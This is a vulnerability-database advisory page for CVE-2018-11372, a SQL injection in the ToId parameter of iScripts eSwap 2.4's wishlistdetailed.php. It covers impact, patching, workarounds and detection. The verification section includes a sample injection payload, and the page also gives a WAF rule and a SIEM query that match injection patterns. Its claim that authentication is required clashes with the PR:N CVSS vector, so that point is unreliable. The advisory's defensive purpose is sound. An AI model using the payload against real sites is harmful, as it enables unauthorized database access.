Login Sign Up

CVE-2018-11372

9.8 CRITICAL
SQL Injection

📋 TL;DR

CVE-2018-11372 is a SQL injection vulnerability in iScripts eSwap v2.4 that allows attackers to execute arbitrary SQL commands via the ToId parameter in wishlistdetailed.php. This affects all users of the vulnerable software version, potentially compromising the entire database.

💻 Affected Systems

Products:
  • iScripts eSwap
Versions: Version 2.4
Operating Systems: All platforms running PHP/MySQL
Default Config Vulnerable: ⚠️ Yes
Notes: Requires PHP/MySQL environment. The vulnerability exists in the default installation.

📦 What is this software?

Eswap by Iscripts

View all CVEs affecting Eswap →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete database compromise including data theft, data manipulation, authentication bypass, and potential remote code execution via database functions.

🟠

Likely Case

Unauthorized data access, extraction of sensitive user information, and potential privilege escalation.

🟢

If Mitigated

Limited impact with proper input validation and parameterized queries in place.

🌐 Internet-Facing: HIGH - The vulnerable endpoint is accessible via the user panel, making internet-facing instances particularly vulnerable.
🏢 Internal Only: MEDIUM - Internal instances are still vulnerable but have reduced attack surface compared to internet-facing deployments.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires user authentication to access the wishlistdetailed.php endpoint. The SQL injection is straightforward once authenticated.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Version 2.5 or later

Vendor Advisory: https://www.iscripts.com/

Restart Required: No

Instructions:

1. Upgrade to iScripts eSwap v2.5 or later. 2. Apply vendor-provided patches if available. 3. Replace wishlistdetailed.php with patched version. 4. Test functionality after update.

🔧 Temporary Workarounds

Input Validation Filter

all

Add server-side validation to ensure ToId parameter contains only numeric values

// PHP example: if(!is_numeric($_GET['ToId'])) { die('Invalid input'); }

WAF Rule

all

Implement web application firewall rules to block SQL injection patterns

# ModSecurity example: SecRule ARGS:ToId "@detectSQLi" "id:1001,phase:2,deny"

🧯 If You Can't Patch

  • Restrict access to wishlistdetailed.php endpoint using IP whitelisting or authentication requirements
  • Implement database user with minimal privileges (read-only if possible) for the application

🔍 How to Verify

Check if Vulnerable:

Test wishlistdetailed.php endpoint with SQL injection payloads like: wishlistdetailed.php?ToId=1' OR '1'='1

Check Version:

Check version in admin panel or review source code headers for version information

Verify Fix Applied:

Verify that SQL injection payloads no longer work and that input validation is properly implemented

📡 Detection & Monitoring

Log Indicators:

  • Unusual SQL queries in database logs
  • Multiple failed login attempts followed by wishlistdetailed.php access
  • SQL error messages in application logs

Network Indicators:

  • HTTP requests to wishlistdetailed.php with SQL injection patterns in parameters
  • Unusual database traffic from web server

SIEM Query:

source="web_logs" AND uri="*wishlistdetailed.php*" AND (param="*ToId=*'*" OR param="*ToId=*%27*")

📊 Metadata

CVE ID: CVE-2018-11372
CVSS v3 Score: 9.8 (CRITICAL)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-89
Published: May 22, 2018
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2018-11372, you might also want to check these:

CVE-2024-8522 10.0

This vulnerability allows unauthenticated attackers to perform SQL injection attacks on WordPress si...

Same vulnerability type (CWE-89)
CVE-2024-13152 10.0

This SQL injection vulnerability in BSS Software's Mobuy Online Machinery Monitoring Panel allows at...

Same vulnerability type (CWE-89)
CVE-2021-42311 10.0

CVE-2021-42311 is a critical SQL injection vulnerability in Microsoft Defender for IoT that allows r...

Same vulnerability type (CWE-89)